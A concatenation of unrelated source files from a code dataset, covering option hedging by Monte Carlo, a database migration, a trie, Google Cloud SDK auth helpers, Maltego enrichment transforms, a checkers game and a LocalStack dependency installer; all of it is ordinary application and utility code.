# determine the expected portfolio value at the next time node
piNext = self.bVals[:, t + 1] + self.opt_hedge[:, t + 1] * self.sVals[:, t + 1]
pi_hat = piNext - np.mean(piNext)
A_mat = self.function_A_vec(t)
B_vec = self.function_B_vec(t, pi_hat)
phi = np.dot(np.linalg.inv(A_mat), B_vec)
self.opt_hedge[:, t] = np.dot(self.data[t, :, :], phi)
self.bVals[:, t] = np.exp(-self.r * self.dt) * (
self.bVals[:, t + 1] + (self.opt_hedge[:, t + 1] - self.opt_hedge[:, t]) * self.sVals[:, t + 1])
# calculate the initial portfolio value
initPortfolioVal = self.bVals[:, 0] + self.opt_hedge[:, 0] * self.sVals[:, 0]
# use only the second half of the paths generated with paths starting from S0
optionVal = np.mean(initPortfolioVal)
optionValVar = np.std(initPortfolioVal)
delta = np.mean(self.opt_hedge[:, 0])
return optionVal, delta, optionValVar
if __name__ == "__main__":
np.random.seed(42)
strike_k = 95
test_vol = 0.2
test_mu = 0.03
dt = 0.01
rfr = 0.05
num_paths = 100
num_periods = 252
hMC = DiscreteBlackScholes(100, strike_k, test_vol, 1., rfr, test_mu, num_periods, num_paths)
hMC.gen_paths()
t = hMC.numSteps - 1
piNext = hMC.bVals[:, t+1] + 0.1 * hMC.sVals[:, t+1]
pi_hat = piNext - np.mean(piNext)
A_mat = hMC.function_A_vec(t)
B_vec = hMC.function_B_vec(t, pi_hat)
phi = np.dot(np.linalg.inv(A_mat), B_vec)
opt_hedge = np.dot(hMC.data[t, :, :], phi)
# plot the results
fig = plt.figure(figsize=(12,4))
ax1 = fig.add_subplot(121)
ax1.scatter(hMC.sVals[:,t], pi_hat)
ax1.set_title(r'Expected $\Pi_0$ vs. $S_t$')
ax1.set_xlabel(r'$S_t$')
ax1.set_ylabel(r'$\Pi_0$')
# input parameters
s0 = 100.0
strike = 100.0
r = 0.05
mu = 0.07 # 0.05
vol = 0.4
T = 1.0
# Simulation Parameters
numPaths = 50000 # number of Monte Carlo trials
numSteps = 6
# create the class object
hMC = DiscreteBlackScholes(s0, strike, vol, T, r, mu, numSteps, numPaths)
# calculation
hMC.gen_paths()
hMC.seed_intrinsic()
option_val, delta, option_val_variance = hMC.roll_backward()
bs_call_value = bs_put(0, s0, K=strike, r=r, sigma=vol, T=T)
print('Option value = ', option_val)
print('Option value variance = ', option_val_variance)
print('Option delta = ', delta)
print('BS value', bs_call_value)
strikes = np.linspace(85, 110, 6)
results = [None] * len(strikes)
bs_prices = np.zeros(len(strikes))
bs_deltas = np.zeros(len(strikes))
numPaths = 50000
hMC = DiscreteBlackScholes(s0, strike, vol, T, r, mu, numSteps, numPaths)
hMC.gen_paths()
for ix, k_strike in enumerate(strikes):
hMC.seed_intrinsic(k_strike)
results[ix] = hMC.roll_backward()
bs_prices[ix] = bs_put(0, s0, K=k_strike, r=r, sigma=vol, T=T)
bs_deltas[ix] = norm.cdf(d1(s0, K=k_strike, r=r, sigma=vol, T=T)) - 1
print("BS price: ", bs_prices)
mc_prices = np.array([x[0] for x in results])
mc_deltas = np.array([x[1] for x in results])
price_variances = np.array([x[-1] for x in results])
prices_diff = mc_prices - bs_prices
deltas_diff = mc_deltas - bs_deltas
print("Price variances: ", price_variances)
|
the-stack_0_12305 | """empty message
Revision ID: 3ca97c203761
Revises: ddc9ab150f3e
Create Date: 2021-05-11 14:59:39.803671
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '3ca97c203761'
down_revision = 'ddc9ab150f3e'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('category',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=50), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_table('post',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('category_id', sa.Integer(), nullable=True),
sa.Column('author_id', sa.Integer(), nullable=True),
sa.Column('title', sa.String(length=80), nullable=True),
sa.Column('body', sa.Text(), nullable=True),
sa.Column('image', sa.String(length=36), nullable=True),
sa.Column('slug', sa.String(length=255), nullable=True),
sa.Column('publish_date', sa.DateTime(), nullable=True),
sa.Column('live', sa.Boolean(), nullable=True),
sa.ForeignKeyConstraint(['author_id'], ['author.id'], ),
sa.ForeignKeyConstraint(['category_id'], ['category.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('slug')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('post')
op.drop_table('category')
# ### end Alembic commands ###
|
the-stack_0_12306 | """
Program 115
Study area.
date 13.12.2020 (Undefined) Hs
@Author: Abraão A. Silva
"""
# Open a file for writing data.
arquivo = open('/home/abraao/Documentos/testando.txt', 'w')  # Mode 'w' overwrites the file.
while True:
nome = str(input('Nome: '))
if nome.isdigit():
print('Programa encerrado.')
break
else:
arquivo.write(nome+'\n')
arquivo.close()
# Or
arquivo = open('/home/abraao/Documentos/testando.txt', 'a')  # Mode 'a' appends entries one after another.
for n in range(3):
nome = str(input('Nome: '))
arquivo.write(nome+'\n')
arquivo.close()
|
the-stack_0_12307 | # -*- coding: utf-8 -*-
"""
Created on Sun Mar 25 18:47:55 2018
@author: bokorn
"""
import cv2
import numpy as np
import tensorflow as tf
def convertSummary(val):
if(val.HasField('simple_value')):
return val.simple_value
elif(val.HasField('obsolete_old_style_histogram')):
raise NotImplementedError()
elif(val.HasField('image')):
return cv2.imdecode(np.frombuffer(val.image.encoded_image_string, np.uint8), cv2.IMREAD_COLOR)
elif(val.HasField('histo')):
return {'bins':val.histo.bucket, 'lims':val.histo.bucket_limit}
elif(val.HasField('audio')):
raise NotImplementedError()
elif(val.HasField('tensor')):
raise NotImplementedError()
return val.tensor.string_val
else:
raise ValueError('Invalid summary type %'.format(val))
def getSummaryData(path, tags):
if(type(tags) is str):
tags = [tags]
data = {}
for t in tags:
data[t] = []
try:
for e in tf.train.summary_iterator(path):
for v in e.summary.value:
if v.tag in tags:
data[v.tag].append([e.step, convertSummary(v)])
except Exception as e:
print(e)
pass
return data
def getWallTime(path):
data = []
try:
for e in tf.train.summary_iterator(path):
data.append([e.step, e.wall_time])
except Exception as e:
print(e)
pass
return data
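# Illustrative usage (added example, not part of the original file): read the
# scalar values logged under a hypothetical tag from an event file. Both the
# path and the tag name are placeholders.
if __name__ == '__main__':
    events_path = '/tmp/logs/events.out.tfevents.example'
    data = getSummaryData(events_path, ['loss'])
    # data['loss'] is a list of [step, value] pairs
    print(len(data['loss']), 'entries read for tag "loss"')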
|
the-stack_0_12311 | from .concat_vec_env import ConcatVecEnv
from .multiproc_vec import ProcConcatVec
class call_wrap:
def __init__(self, fn, data):
self.fn = fn
self.data = data
def __call__(self, *args):
return self.fn(self.data)
def MakeCPUAsyncConstructor(max_num_cpus):
if max_num_cpus == 0:
return ConcatVecEnv
else:
def constructor(env_fn_list, obs_space, act_space):
example_env = env_fn_list[0]()
envs_per_env = getattr(example_env, "num_envs", 1)
num_fns = len(env_fn_list)
envs_per_cpu = (num_fns + max_num_cpus - 1) // max_num_cpus
alloced_num_cpus = (num_fns + envs_per_cpu - 1) // envs_per_cpu
env_cpu_div = []
num_envs_alloced = 0
while num_envs_alloced < num_fns:
start_idx = num_envs_alloced
end_idx = min(num_fns, start_idx + envs_per_cpu)
env_cpu_div.append(env_fn_list[start_idx:end_idx])
num_envs_alloced = end_idx
assert alloced_num_cpus == len(env_cpu_div)
cat_env_fns = [call_wrap(ConcatVecEnv, env_fns) for env_fns in env_cpu_div]
return ProcConcatVec(cat_env_fns, obs_space, act_space, num_fns * envs_per_env)
return constructor
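# Illustrative sketch (added example, not part of the original module): build a
# vectorized environment from 8 copies of an env factory, spread over at most
# 2 worker processes. `make_env`, `obs_space`, and `act_space` stand in for a
# real environment factory and its observation/action spaces.
def _example_build_vec_env(make_env, obs_space, act_space, num_envs=8, max_cpus=2):
    constructor = MakeCPUAsyncConstructor(max_cpus)
    return constructor([make_env] * num_envs, obs_space, act_space)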
|
the-stack_0_12314 | import sys
from helpers import api_qradio as q
from helpers import MaltegoTransform
##############################################################
## ENRICH Section
def ipv4_enrich(mt, ip_address):
enrich_list = q.ipv4_enrich(ip_address)
for domain in enrich_list['domains']:
mt.addEntity("maltego.Domain", domain)
for hash in enrich_list['hash']:
mt.addEntity("maltego.Hash", hash)
for score in enrich_list['score']:
mt.addEntity("maltego.Score", score)
mt.addEntity("maltego.Blacklist", str(enrich_list['blacklist']))
return mt
def domain_enrich(mt, domain_name):
enrich_list = q.domain_enrich(domain_name)
for ip_address in enrich_list['ip_address']:
mt.addEntity("maltego.IPv4Address", ip_address)
for hash in enrich_list['hash']:
mt.addEntity("maltego.Hash", hash)
for score in enrich_list['score']:
mt.addEntity("maltego.Score", score)
return mt
def hash_enrich(mt, hash_value):
enrich_list = q.hash_enrich(hash_value)
for score in enrich_list:
mt.addEntity("maltego.Score", score['score'])
for ip_address in enrich_list:
mt.addEntity("maltego.IPv4Address", ip_address['ip_address'])
for imphash in enrich_list:
mt.addEntity("maltego.Imphash", imphash['imphash'])
for uri in enrich_list:
mt.addEntity("maltego.URI", uri['uri'])
return mt
##############################################################
## IP section
def ipv4_to_domain(mt, ip_address):
domain_list = q.ipv4_to_domain(ip_address)
for domain in domain_list:
mt.addEntity("maltego.Domain", domain)
return mt
def ipv4_to_hash(mt, ip_address):
hash_list = q.ipv4_to_hash(ip_address)
for hash in hash_list:
mt.addEntity("maltego.Hash", hash)
return mt
def ipv4_to_blacklist(mt, ip_address):
blacklisted = q.ipv4_to_blacklist(ip_address)
mt.addEntity("maltego.Blacklist", blacklisted)
return mt
def ipv4_to_score(mt, ip_address):
score_list = q.ipv4_to_score(ip_address)
for score in score_list:
mt.addEntity("maltego.Score", score)
return mt
##############################################################
## Domain section
def domain_to_ipv4(mt, domain_name):
ip_list = q.domain_to_ipv4(domain_name)
for ip_address in ip_list:
mt.addEntity("maltego.IPv4Address", ip_address)
return mt
def domain_to_hash(mt, domain_name):
hash_list = q.domain_to_hash(domain_name)
for hash in hash_list:
mt.addEntity("maltego.Hash", hash)
return mt
def domain_to_score(mt, domain_name):
score_list = q.domain_to_score(domain_name)
for score in score_list:
mt.addEntity("maltego.Score", score)
return mt
##############################################################
## Hash section
def hash_to_score(mt, hash_value):
    score_list = q.hash_to_score(hash_value)
for score in score_list:
mt.addEntity("maltego.Score", score)
return mt
def hash_to_imphash(mt, hash_value):
    imphash_list = q.hash_to_imphash(hash_value)
for imphash in imphash_list:
mt.addEntity("maltego.Imphash", imphash)
return mt
def hash_to_ipv4(mt, hash_value):
    ip_list = q.hash_to_ipv4(hash_value)
for ip_address in ip_list:
mt.addEntity("maltego.IPv4Address", ip_address)
return mt
def hash_to_uri(mt, hash_value):
    uri_list = q.hash_to_uri(hash_value)
for uri in uri_list:
mt.addEntity("maltego.URI", uri)
return mt
##############################################################
## Imphash section
def imphash_to_hash(mt, imphash):
hash_list = q.imphash_to_hash(imphash)
for hash in hash_list:
mt.addEntity("maltego.Hash", hash)
return mt
##############################################################
functions = {
'ipv4_enrich': ipv4_enrich,
'domain_enrich': domain_enrich,
'hash_enrich': hash_enrich,
'ipv4_to_domain': ipv4_to_domain,
'ipv4_to_hash': ipv4_to_hash,
'ipv4_to_blacklist': ipv4_to_blacklist,
'ipv4_to_score': ipv4_to_score,
'domain_to_ipv4': domain_to_ipv4,
'domain_to_hash': domain_to_hash,
'domain_to_score': domain_to_score,
'hash_to_score': hash_to_score,
'hash_to_imphash': hash_to_imphash,
'hash_to_ipv4': hash_to_ipv4,
'hash_to_uri': hash_to_uri,
'imphash_to_hash': imphash_to_hash,
}
##### MAIN #####
if __name__ == '__main__':
transform = sys.argv[1]
data = sys.argv[2]
mt = MaltegoTransform()
result = functions[transform](mt, data)
result.returnOutput() |
the-stack_0_12315 |
class Node():
def __init__(self, alphabet):
self.char = alphabet
self.children = []
self.end_of_word = False
self.counter = 1
'''
Create a tree of alphabets like this:
+
/ \
c d
/ \
a o
/ \ \
t p g
'''
class Trie():
def __init__(self):
self.root = Node('+')
def addWord(self, word):
node = self.root
for letter in word:
found_flag = False
for child in node.children:
if child.char == letter:
child.counter += 1
node = child
found_flag = True
break
if not found_flag:
newChild = Node(letter)
node.children.append(newChild)
node = newChild
node.end_of_word = True
    def findWord(self, word):
        node = self.root
        found_flag = False
        for letter in word:
            found_flag = False
            for child in node.children:
                if child.char == letter:
                    node = child
                    found_flag = True
                    break
            # Stop as soon as a letter has no matching child, otherwise a
            # later letter could falsely match deeper in the tree.
            if not found_flag:
                return False
        return found_flag and node.end_of_word
    def delWord(self, word):
        node = self.root
        if not self.findWord(word):
            print("Word not found")
            return
        # Walk the word's path, decrementing the per-node word counters.
        # A node whose counter drops to zero is used by no other word, so its
        # whole subtree can be pruned.
        for letter in word:
            for child in node.children:
                if child.char == letter:
                    child.counter -= 1
                    if child.counter == 0:
                        node.children.remove(child)
                        return
                    node = child
                    break
        # The word is a prefix of other stored words (e.g. deleting 'dog'
        # while keeping 'dogs'): just clear the end-of-word flag.
        node.end_of_word = False
        return
def discover(self, node, prefix):
words = []
for child in node.children:
if child.end_of_word:
words.append(prefix + child.char)
if child.children:
words.extend(self.discover(child, prefix + child.char))
else:
words.extend(self.discover(child, prefix + child.char))
return words
def wordsWithPrefix(self, prefix):
node = self.root
found_flag = False
for letter in prefix:
found_flag = False
for child in node.children:
if letter == child.char:
node = child
found_flag = True
break
if not found_flag:
return []
return self.discover(node, prefix)
def allWords(self):
node = self.root
return self.discover(node, "")
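# Illustrative usage (added example, not part of the original file): exercise
# the Trie with a few words that share prefixes.
if __name__ == '__main__':
    trie = Trie()
    for word in ('cat', 'cap', 'cog', 'dog', 'dogs'):
        trie.addWord(word)
    print(trie.findWord('dog'))        # expected: True
    print(trie.wordsWithPrefix('ca'))  # expected: ['cat', 'cap']
    trie.delWord('dog')                # 'dogs' stays stored
    print(trie.findWord('dog'))        # expected: False
    print(trie.findWord('dogs'))       # expected: True
    print(trie.allWords())             # remaining words in the trie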
|
the-stack_0_12318 | # -*- coding: utf-8 -*- #
# Copyright 2016 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A library to support auth commands."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import json
from googlecloudsdk.core import context_aware
from googlecloudsdk.core import exceptions
from googlecloudsdk.core import log
from googlecloudsdk.core import yaml
from googlecloudsdk.core.credentials import flow as c_flow
from googlecloudsdk.core.credentials import google_auth_credentials as c_google_auth
from googlecloudsdk.core.util import files
# Client ID from project "usable-auth-library", configured for
# general purpose API testing
# pylint: disable=g-line-too-long
DEFAULT_CREDENTIALS_DEFAULT_CLIENT_ID = '764086051850-6qr4p6gpi6hn506pt8ejuq83di341hur.apps.googleusercontent.com'
DEFAULT_CREDENTIALS_DEFAULT_CLIENT_SECRET = 'd-FL95Q19q7MQmFpd7hHD0Ty'
CLOUD_PLATFORM_SCOPE = 'https://www.googleapis.com/auth/cloud-platform'
GOOGLE_DRIVE_SCOPE = 'https://www.googleapis.com/auth/drive'
USER_EMAIL_SCOPE = 'https://www.googleapis.com/auth/userinfo.email'
OPENID = 'openid'
DEFAULT_SCOPES = [
OPENID,
USER_EMAIL_SCOPE,
CLOUD_PLATFORM_SCOPE
]
CLIENT_SECRET_INSTALLED_TYPE = 'installed'
class Error(exceptions.Error):
"""A base exception for this class."""
pass
class InvalidClientSecretsError(Error):
"""An error for when we fail to load the client secrets file."""
pass
class BadCredentialFileException(Error):
"""Raised when credentials file cannot be read."""
pass
def GetCredentialsConfigFromFile(filename):
"""Returns the JSON content of a credentials config file.
This function is useful when the content of a file needs to be inspected first
before determining how to handle it (how to initialize the underlying
credentials). Only UTF-8 JSON files are supported.
Args:
filename (str): The filepath to the ADC file representing credentials.
Returns:
Optional(Mapping): The JSON content.
Raises:
BadCredentialFileException: If JSON parsing of the file fails.
"""
try:
# YAML is a superset of JSON.
content = yaml.load_path(filename)
except UnicodeDecodeError as e:
raise BadCredentialFileException(
'File {0} is not utf-8 encoded: {1}'.format(filename, e))
except yaml.YAMLParseError as e:
raise BadCredentialFileException('Could not read json file {0}: {1}'.format(
filename, e))
# Require the JSON content to be an object.
# Credentials and configs are always objects.
if not isinstance(content, dict):
raise BadCredentialFileException(
'Could not read json file {0}'.format(filename))
return content
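# Illustrative use (hypothetical path; the returned mapping is whatever JSON object
# the file holds, e.g. an authorized_user or service_account credential config):
#   cred_config = GetCredentialsConfigFromFile('/tmp/adc.json')
#   cred_type = cred_config.get('type')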
def DoInstalledAppBrowserFlowGoogleAuth(launch_browser,
scopes,
client_id_file=None):
"""Launches a 3LO oauth2 flow to get google-auth credentials.
Args:
launch_browser: bool, True to launch the browser, false to ask users to copy
the auth url to a browser.
scopes: [str], The list of scopes to authorize.
client_id_file: str, The path to a file containing the client id and secret
to use for the flow. If None, the default client id for the Cloud SDK is
used.
Returns:
google.auth.credentials.Credentials, The credentials obtained from the flow.
"""
if client_id_file:
AssertClientSecretIsInstalledType(client_id_file)
google_auth_flow = c_flow.CreateGoogleAuthFlow(scopes, client_id_file)
try:
user_creds = c_flow.RunGoogleAuthFlow(google_auth_flow, launch_browser)
return c_google_auth.Credentials.FromGoogleAuthUserCredentials(
user_creds)
except c_flow.Error as e:
if context_aware.IsContextAwareAccessDeniedError(e):
msg = context_aware.CONTEXT_AWARE_ACCESS_HELP_MSG
else:
msg = 'There was a problem with web authentication.'
if launch_browser:
msg += ' Try running again with --no-launch-browser.'
log.error(msg)
raise
def GetClientSecretsType(client_id_file):
"""Get the type of the client secrets file (web or installed)."""
invalid_file_format_msg = (
'Invalid file format. See '
'https://developers.google.com/api-client-library/'
'python/guide/aaa_client_secrets')
try:
obj = json.loads(files.ReadFileContents(client_id_file))
except files.Error:
raise InvalidClientSecretsError(
'Cannot read file: "%s"' % client_id_file)
if obj is None:
raise InvalidClientSecretsError(invalid_file_format_msg)
if len(obj) != 1:
raise InvalidClientSecretsError(
invalid_file_format_msg + ' '
'Expected a JSON object with a single property for a "web" or '
'"installed" application')
return tuple(obj)[0]
def AssertClientSecretIsInstalledType(client_id_file):
client_type = GetClientSecretsType(client_id_file)
if client_type != CLIENT_SECRET_INSTALLED_TYPE:
raise InvalidClientSecretsError(
'Only client IDs of type \'%s\' are allowed, but encountered '
'type \'%s\'' % (CLIENT_SECRET_INSTALLED_TYPE, client_type))
|
the-stack_0_12321 | import pygame
from .board import Board
from .config import RED, WHITE, BLUE, BLACK, SQUARE_SIZE
class Game():
def __init__(self, win):
self.win = win
self._init()
def _init(self):
self.selected_piece = None
self.board = Board()
self.turn = RED
self.valid_moves = {}
def update(self):
self.board.draw(self.win)
self.draw_valid_moves(self.valid_moves)
pygame.display.update()
def reset(self):
self._init()
def select(self, row, col):
if self.selected_piece:
result = self._move(row, col)
if not result:
self.selected_piece = None
self.select(row, col)
piece = self.board.get_piece(row, col)
if piece != 0 and piece.color == self.turn:
self.selected_piece = piece
self.valid_moves = self.board.get_valid_moves(piece)
return True
return False
def _move(self, row, col):
piece = self.board.get_piece(row, col)
if self.selected_piece and piece == 0 and (row, col) in self.valid_moves:
self.board.move(self.selected_piece, row, col)
skipped = self.valid_moves[(row, col)]
if skipped:
self.board.remove(skipped)
self.change_turn()
return True
return False
def draw_valid_moves(self, moves):
for move in moves:
row, col = move
half_square_size = SQUARE_SIZE // 2
x_pos = col * SQUARE_SIZE + half_square_size
y_pos = row * SQUARE_SIZE + half_square_size
radius = 15
pygame.draw.circle(self.win, BLUE, (x_pos, y_pos), radius)
def change_turn(self):
self.valid_moves = {}
self.turn = BLUE if self.turn == RED else RED
def winner(self):
return self.board.winner(self.turn)
def get_board(self):
return self.board
def ai_move(self, board):
self.board = board
self.change_turn()
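# A minimal driver sketch for the Game class above. In this package layout it would
# normally live in a separate main.py (the relative imports prevent running this
# module directly); the window size below is a placeholder.
#
#   pygame.init()
#   win = pygame.display.set_mode((800, 800))
#   game = Game(win)
#   run = True
#   while run:
#       for event in pygame.event.get():
#           if event.type == pygame.QUIT:
#               run = False
#           elif event.type == pygame.MOUSEBUTTONDOWN:
#               x, y = pygame.mouse.get_pos()
#               game.select(y // SQUARE_SIZE, x // SQUARE_SIZE)
#       game.update()
#   pygame.quit()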
|
the-stack_0_12323 | #!/usr/bin/env python
import glob
import logging
import os
import platform
import re
import shutil
import sys
import tempfile
import time
import requests
from localstack import config
from localstack.config import KINESIS_PROVIDER
from localstack.constants import (
DEFAULT_SERVICE_PORTS,
DYNAMODB_JAR_URL,
DYNAMODB_JAR_URL_ALPINE,
ELASTICMQ_JAR_URL,
ELASTICSEARCH_DEFAULT_VERSION,
ELASTICSEARCH_DELETE_MODULES,
ELASTICSEARCH_PLUGIN_LIST,
ELASTICSEARCH_URLS,
INSTALL_DIR_INFRA,
KMS_URL_PATTERN,
LOCALSTACK_INFRA_PROCESS,
LOCALSTACK_MAVEN_VERSION,
MODULE_MAIN_PATH,
STS_JAR_URL,
)
from localstack.utils import bootstrap
from localstack.utils.common import is_windows
if __name__ == "__main__":
bootstrap.bootstrap_installation()
# noqa: E402
from localstack.utils.common import (
chmod_r,
download,
get_arch,
in_docker,
is_alpine,
load_file,
mkdir,
new_tmp_file,
parallelize,
rm_rf,
run,
save_file,
untar,
unzip,
)
INSTALL_DIR_NPM = "%s/node_modules" % MODULE_MAIN_PATH
INSTALL_DIR_DDB = "%s/dynamodb" % INSTALL_DIR_INFRA
INSTALL_DIR_KCL = "%s/amazon-kinesis-client" % INSTALL_DIR_INFRA
INSTALL_DIR_STEPFUNCTIONS = "%s/stepfunctions" % INSTALL_DIR_INFRA
INSTALL_DIR_KMS = "%s/kms" % INSTALL_DIR_INFRA
INSTALL_DIR_ELASTICMQ = "%s/elasticmq" % INSTALL_DIR_INFRA
INSTALL_PATH_LOCALSTACK_FAT_JAR = "%s/localstack-utils-fat.jar" % INSTALL_DIR_INFRA
INSTALL_PATH_DDB_JAR = os.path.join(INSTALL_DIR_DDB, "DynamoDBLocal.jar")
INSTALL_PATH_KCL_JAR = os.path.join(INSTALL_DIR_KCL, "aws-java-sdk-sts.jar")
INSTALL_PATH_STEPFUNCTIONS_JAR = os.path.join(INSTALL_DIR_STEPFUNCTIONS, "StepFunctionsLocal.jar")
INSTALL_PATH_KMS_BINARY_PATTERN = os.path.join(INSTALL_DIR_KMS, "local-kms.<arch>.bin")
INSTALL_PATH_ELASTICMQ_JAR = os.path.join(INSTALL_DIR_ELASTICMQ, "elasticmq-server.jar")
INSTALL_PATH_KINESALITE_CLI = os.path.join(INSTALL_DIR_NPM, "kinesalite", "cli.js")
INSTALL_PATH_KINESIS_MOCK = os.path.join(INSTALL_DIR_INFRA, "kinesis-mock")
URL_LOCALSTACK_FAT_JAR = (
"https://repo1.maven.org/maven2/"
+ "cloud/localstack/localstack-utils/{v}/localstack-utils-{v}-fat.jar"
).format(v=LOCALSTACK_MAVEN_VERSION)
MARKER_FILE_LIGHT_VERSION = "%s/.light-version" % INSTALL_DIR_INFRA
IMAGE_NAME_SFN_LOCAL = "amazon/aws-stepfunctions-local"
ARTIFACTS_REPO = "https://github.com/localstack/localstack-artifacts"
SFN_PATCH_CLASS = (
"com/amazonaws/stepfunctions/local/runtime/executors/task/LambdaTaskStateExecutor.class"
)
SFN_PATCH_CLASS_URL = "%s/raw/master/stepfunctions-local-patch/%s" % (
ARTIFACTS_REPO,
SFN_PATCH_CLASS,
)
# kinesis-mock version
KINESIS_MOCK_VERSION = os.environ.get("KINESIS_MOCK_VERSION") or "0.1.3"
KINESIS_MOCK_RELEASE_URL = (
"https://api.github.com/repos/etspaceman/kinesis-mock/releases/tags/" + KINESIS_MOCK_VERSION
)
DEBUGPY_MODULE = "debugpy"
DEBUGPY_DEPENDENCIES = ["gcc", "python3-dev", "musl-dev"]
# Target version for javac, to ensure compatibility with earlier JREs
JAVAC_TARGET_VERSION = "1.8"
# SQS backend implementation provider - either "moto" or "elasticmq"
SQS_BACKEND_IMPL = os.environ.get("SQS_PROVIDER") or "moto"
# TODO: 2019-10-09: Temporarily overwriting DDB, as we're hitting a SIGSEGV JVM crash with the latest version
OVERWRITE_DDB_FILES_IN_DOCKER = False
# set up logger
LOG = logging.getLogger(__name__)
def get_elasticsearch_install_version(version=None):
if config.SKIP_INFRA_DOWNLOADS:
return ELASTICSEARCH_DEFAULT_VERSION
return version or ELASTICSEARCH_DEFAULT_VERSION
def get_elasticsearch_install_dir(version=None):
version = get_elasticsearch_install_version(version)
if version == ELASTICSEARCH_DEFAULT_VERSION and not os.path.exists(MARKER_FILE_LIGHT_VERSION):
# install the default version into a subfolder of the code base
install_dir = os.path.join(INSTALL_DIR_INFRA, "elasticsearch")
else:
install_dir = os.path.join(config.TMP_FOLDER, "elasticsearch", version)
return install_dir
def install_elasticsearch(version=None):
version = get_elasticsearch_install_version(version)
install_dir = get_elasticsearch_install_dir(version)
installed_executable = os.path.join(install_dir, "bin", "elasticsearch")
if not os.path.exists(installed_executable):
log_install_msg("Elasticsearch (%s)" % version)
es_url = ELASTICSEARCH_URLS.get(version)
if not es_url:
raise Exception('Unable to find download URL for Elasticsearch version "%s"' % version)
install_dir_parent = os.path.dirname(install_dir)
mkdir(install_dir_parent)
# download and extract archive
tmp_archive = os.path.join(config.TMP_FOLDER, "localstack.%s" % os.path.basename(es_url))
download_and_extract_with_retry(es_url, tmp_archive, install_dir_parent)
elasticsearch_dir = glob.glob(os.path.join(install_dir_parent, "elasticsearch*"))
if not elasticsearch_dir:
raise Exception("Unable to find Elasticsearch folder in %s" % install_dir_parent)
shutil.move(elasticsearch_dir[0], install_dir)
for dir_name in ("data", "logs", "modules", "plugins", "config/scripts"):
dir_path = os.path.join(install_dir, dir_name)
mkdir(dir_path)
chmod_r(dir_path, 0o777)
# install default plugins
for plugin in ELASTICSEARCH_PLUGIN_LIST:
if is_alpine():
# https://github.com/pires/docker-elasticsearch/issues/56
os.environ["ES_TMPDIR"] = "/tmp"
plugin_binary = os.path.join(install_dir, "bin", "elasticsearch-plugin")
plugin_dir = os.path.join(install_dir, "plugins", plugin)
if not os.path.exists(plugin_dir):
LOG.info("Installing Elasticsearch plugin %s" % (plugin))
run("%s install -b %s" % (plugin_binary, plugin))
# delete some plugins to free up space
for plugin in ELASTICSEARCH_DELETE_MODULES:
module_dir = os.path.join(install_dir, "modules", plugin)
rm_rf(module_dir)
# disable x-pack-ml plugin (not working on Alpine)
xpack_dir = os.path.join(install_dir, "modules", "x-pack-ml", "platform")
rm_rf(xpack_dir)
# patch JVM options file - replace hardcoded heap size settings
jvm_options_file = os.path.join(install_dir, "config", "jvm.options")
if os.path.exists(jvm_options_file):
jvm_options = load_file(jvm_options_file)
jvm_options_replaced = re.sub(
r"(^-Xm[sx][a-zA-Z0-9\.]+$)", r"# \1", jvm_options, flags=re.MULTILINE
)
if jvm_options != jvm_options_replaced:
save_file(jvm_options_file, jvm_options_replaced)
def install_elasticmq():
if SQS_BACKEND_IMPL != "elasticmq":
return
# TODO remove this function if we stop using ElasticMQ entirely
if not os.path.exists(INSTALL_PATH_ELASTICMQ_JAR):
log_install_msg("ElasticMQ")
mkdir(INSTALL_DIR_ELASTICMQ)
# download archive
tmp_archive = os.path.join(config.TMP_FOLDER, "elasticmq-server.jar")
if not os.path.exists(tmp_archive):
download(ELASTICMQ_JAR_URL, tmp_archive)
shutil.copy(tmp_archive, INSTALL_DIR_ELASTICMQ)
def install_kinesis():
if KINESIS_PROVIDER == "kinesalite":
return install_kinesalite()
elif KINESIS_PROVIDER == "kinesis-mock":
return install_kinesis_mock()
else:
raise ValueError("unknown kinesis provider %s" % KINESIS_PROVIDER)
def install_kinesalite():
if not os.path.exists(INSTALL_PATH_KINESALITE_CLI):
log_install_msg("Kinesis")
run('cd "%s" && npm install' % MODULE_MAIN_PATH)
def install_kinesis_mock():
target_dir = INSTALL_PATH_KINESIS_MOCK
machine = platform.machine().lower()
system = platform.system().lower()
version = platform.version().lower()
is_probably_m1 = system == "darwin" and ("arm64" in version or "arm32" in version)
LOG.debug("getting kinesis-mock for %s %s", system, machine)
if (machine == "x86_64" or machine == "amd64") and not is_probably_m1:
if system == "windows":
bin_file = "kinesis-mock-mostly-static.exe"
elif system == "linux":
bin_file = "kinesis-mock-linux-amd64-static"
elif system == "darwin":
bin_file = "kinesis-mock-macos-amd64-dynamic"
else:
bin_file = "kinesis-mock.jar"
else:
bin_file = "kinesis-mock.jar"
bin_file_path = os.path.join(target_dir, bin_file)
if os.path.exists(bin_file_path):
LOG.debug("kinesis-mock found at %s", bin_file_path)
return bin_file_path
response = requests.get(KINESIS_MOCK_RELEASE_URL)
if not response.ok:
raise ValueError(
"Could not get list of releases from %s: %s" % (KINESIS_MOCK_RELEASE_URL, response.text)
)
github_release = response.json()
download_url = None
for asset in github_release.get("assets", []):
# find the correct binary in the release
if asset["name"] == bin_file:
download_url = asset["browser_download_url"]
break
if download_url is None:
raise ValueError(
"could not find required binary %s in release %s" % (bin_file, KINESIS_MOCK_RELEASE_URL)
)
mkdir(target_dir)
LOG.info("downloading kinesis-mock binary from %s", download_url)
download(download_url, bin_file_path)
chmod_r(bin_file_path, 0o777)
return bin_file_path
def install_local_kms():
local_arch = get_arch()
binary_path = INSTALL_PATH_KMS_BINARY_PATTERN.replace("<arch>", local_arch)
if not os.path.exists(binary_path):
log_install_msg("KMS")
mkdir(INSTALL_DIR_KMS)
